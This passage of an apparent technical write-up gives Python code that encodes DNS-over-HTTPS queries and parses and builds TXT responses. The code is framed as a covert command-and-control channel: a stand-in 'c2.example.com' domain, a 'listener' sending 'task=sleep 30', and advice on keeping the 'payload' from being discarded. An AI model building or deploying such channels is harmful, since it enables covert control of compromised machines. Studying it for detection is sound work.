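            "Content-Type: application/dns-message\r\nContent-Length: %d\r\n\r\n"
            % (path, host, len(msg)))
    return head.encode() + msg


def decode_name(msg, pos):
    """Decode a possibly compressed name -> (name, position after it)."""
    labels = []
    while True:
        n = msg[pos]
        if n & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack(">H", msg[pos:pos + 2])[0] & 0x3FFF
            labels.append(decode_name(msg, ptr)[0])
            return ".".join(labels), pos + 2
        pos += 1
        if n == 0:
            return ".".join(labels), pos
        labels.append(msg[pos:pos + n].decode())
        pos += n


def build_txt_response(query, texts, ttl=60):
    """Listener side: copy the question back and answer with one TXT RR whose
    owner name is a compression pointer to the question name at offset 12."""
    header = query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0)   # QR, RD, RA
    question = query[12:]
    rdata = b"".join(bytes([len(t)]) + t for t in texts)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", TXT, IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_txt_answers(msg):
    """Return (txid, flags, [TXT strings]) from a DNS response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", msg[:12])
    pos = 12
    for _ in range(qdcount):
        _, pos = decode_name(msg, pos)
        pos += 4                                   # QTYPE + QCLASS
    texts = []
    for _ in range(ancount):
        _, pos = decode_name(msg, pos)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[pos:pos + 10])
        pos += 10
        rdata, pos = msg[pos:pos + rdlen], pos + rdlen
        if rtype == TXT:
            i = 0
            while i < len(rdata):                  # TXT rdata is a series of <len><bytes>
                texts.append(rdata[i + 1:i + 1 + rdata[i]])
                i += 1 + rdata[i]
    return txid, flags, texts


if __name__ == "__main__":
    q = build_query("a1b2c3.c2.example.com")       # constructed domain
    print(doh_get_path(q))
    print(doh_post_request(q, "doh.example.com").split(b"\r\n\r\n")[0].decode())
    r = build_txt_response(q, [b"task=sleep 30"])
    print(parse_txt_answers(r))
```

Two details matter when validating a listener of this kind against the debug log: the GET form must strip base64 padding (RFC 8484 requires it), and the answer must echo the transaction ID and question, otherwise a resolver or proxy in the path will discard the response before the payload ever sees it.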